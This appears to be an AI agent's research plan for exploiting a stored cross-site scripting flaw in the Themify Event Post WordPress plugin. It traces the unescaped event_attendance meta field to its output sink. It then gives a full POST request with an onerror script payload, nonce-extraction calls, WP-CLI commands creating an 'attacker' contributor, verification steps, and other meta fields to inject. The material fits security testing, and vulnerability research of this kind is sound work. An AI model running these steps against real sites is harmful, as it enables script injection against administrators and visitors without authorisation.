Themify Event Post <= 1.3.4 - Authenticated (Contributor+) Stored Cross-Site Scripting

This research plan outlines the steps to exploit a Stored Cross-Site Scripting (XSS) vulnerability in the Themify Event Post plugin (<= 1.3.4).

1. Vulnerability Summary

The plugin fails to sanitize and escape post metadata associated with the event custom post type. Specifically, the function themify_event_type() in includes/functions.php retrieves the meta key event_attendance and echoes it directly to the page using sprintf without any call to esc_html(), esc_attr(), or wp_kses(). This allows a Contributor-level user to inject arbitrary HTML and JavaScript into the event_attendance field, which is then executed when any user (including an Administrator) views the affected event post or a list of events.

2. Attack Vector Analysis

• Vulnerable Endpoint: wp-admin/post.php (via the standard WordPress post saving mechanism).
• Vulnerable Parameter: event_attendance (sent as a POST parameter during post creation or update).
• Authentication Level: Contributor or above. Contributors can create and edit their own posts of the event type.
• Preconditions: The plugin must be active, and the 'event' post type must be registered (handled automatically on activation).

3. Code Flow

1. Input Source: An authenticated user with edit_posts capability (Contributor+) submits a POST request to wp-admin/post.php to save or update a post of type event. The request contains the malicious payload in the event_attendance field.
2. Storage: While the specific saving logic is in includes/post-type.php (not provided in full), the vulnerability description confirms that input is not sanitized. The payload is stored in the wp_postmeta table under the key event_attendance.
3. Data Retrieval: When the event is rendered (either on a single post page or via a shortcode), the function themify_event_type() is called.
   • Location: includes/functions.php
   • Code: $e_type = get_post_meta( $post_id, 'event_attendance', true );
4. Vulnerable Sink: The retrieved $e_type is printed raw.
   • Location: includes/functions.php
   • Code: echo sprintf('<div class="tep_type">%s</div>',$e_type);

4. Nonce Acquisition Strategy

To save a post in WordPress, a valid _wpnonce for the update-post_<ID> action is required.

1. Navigate to Post Creation: Use browser_navigate to wp-admin/post-new.php?post_type=event.
2. Extract Nonce and ID: Use browser_eval to extract the _wpnonce value from the form and the post_ID from the hidden input or the URL.
   • browser_eval("document.querySelector('#_wpnonce').value")
   • browser_eval("document.querySelector('#post_ID').value")

5. Exploitation Strategy

1. Setup: Create a Contributor user and log in.
2. Intercept/Identify Field: Although the provided source doesn't show the HTML form, standard Themify meta boxes typically use the meta key as the name attribute. We will send event_attendance in the POST request.
3. HTTP Request (Post Update):
   • Tool: http_request
   • URL: https://<TARGET>/wp-admin/post.php
   • Method: POST
   • Headers: Content-Type: application/x-www-form-urlencoded
   • Body:

     action=editpost
     &post_type=event
     &post_ID=<POST_ID>
     &_wpnonce=<NONCE>
     &post_title=XSS+Test+Event
     &event_attendance=<img src=x onerror=alert(origin)>
     &save=Save+Draft
     

4. Trigger Execution: View the event post. Since we may not know the theme's layout, the most reliable way to trigger the sink is to view a page containing the plugin's shortcode.
   • Create a page with: [themify_event_post id="<POST_ID>"]
   • Navigate to this page.

6. Test Data Setup

1. Create Contributor: wp user create attacker attacker@example.com --role=contributor --user_pass=password
2. Create View Page: wp post create --post_type=page --post_title="Event Display" --post_status=publish --post_content='[themify_event_post]'

7. Expected Results

• The POST request to post.php should return a 302 redirect to the editor page, indicating the post was saved.
• When navigating to the "Event Display" page, the browser should execute the JavaScript alert(origin), confirming that the payload was rendered without escaping.

8. Verification Steps

1. Check Meta Storage: wp post meta get <POST_ID> event_attendance
   • Success criteria: Output matches <img src=x onerror=alert(origin)>
2. Inspect HTML Output: Use http_request (GET) on the page containing the shortcode and search for the payload.
   • Success criteria: The response body contains <div class="tep_type"><img src=x onerror=alert(origin)></div>

9. Alternative Approaches

If event_attendance is not directly editable via post.php, try:

• Custom Field Injection: Use the standard WordPress metakeyselect/metavalue fields if the "Custom Fields" meta box is enabled.
• Other Meta Keys: The snippet mentions event_organizer, event_performer, and event_location in the shortcode defaults. Check if functions like themify_event_organizer() also lack escaping (common in Themify plugins).
• Map Address: Inject the payload into the address parameter of the [themify_event_post] shortcode if the Contributor can edit pages, or via the map meta field, as themify_event_post_map renders a data-map attribute which might be parsed unsafely by the plugin's JavaScript.